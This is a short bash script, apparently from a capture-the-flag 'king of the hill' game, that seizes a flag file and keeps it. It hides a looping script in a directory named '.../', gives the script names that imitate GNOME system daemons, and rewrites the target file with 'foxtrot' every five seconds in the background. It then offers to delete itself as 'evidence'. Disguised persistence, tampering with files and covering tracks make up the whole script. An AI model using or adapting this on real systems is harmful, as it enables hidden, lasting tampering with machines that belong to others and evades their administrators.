#!/bin/bash
# Purpose: To reclaim flags
# Written by: Foxtrot
#
# GET GUDDDD
#########################

# requires a location of file
if [ $# -ne 1 ]; then
	echo "Usage ./werun <location of banner>"
	exit
fi

target=$1


# assuming privileges allowed
##### PREPWORK #####

if [ ! -d ".../" ]; then
	`mkdir .../`
fi

`touch .../`
los=".../gsd-media-sound"

if [ -f $los ]; then
	los=".../gsd-media-controls"
fi

if [ -f $los ]; then
	los=".../gsd-mouse"
fi



echo "#!/bin/bash" > $los
echo "while true; do echo "foxtrot" > $target; sleep 5; done" >> $los
`chmod u+x $los`

##### Running #####
`$los` &
`disown`

echo "Delete the evidence?"

read inputcommand

if [ $inputcommand == "yes" ] || [ $inputcommand == "y" ]; then
	`rm werun`
fi

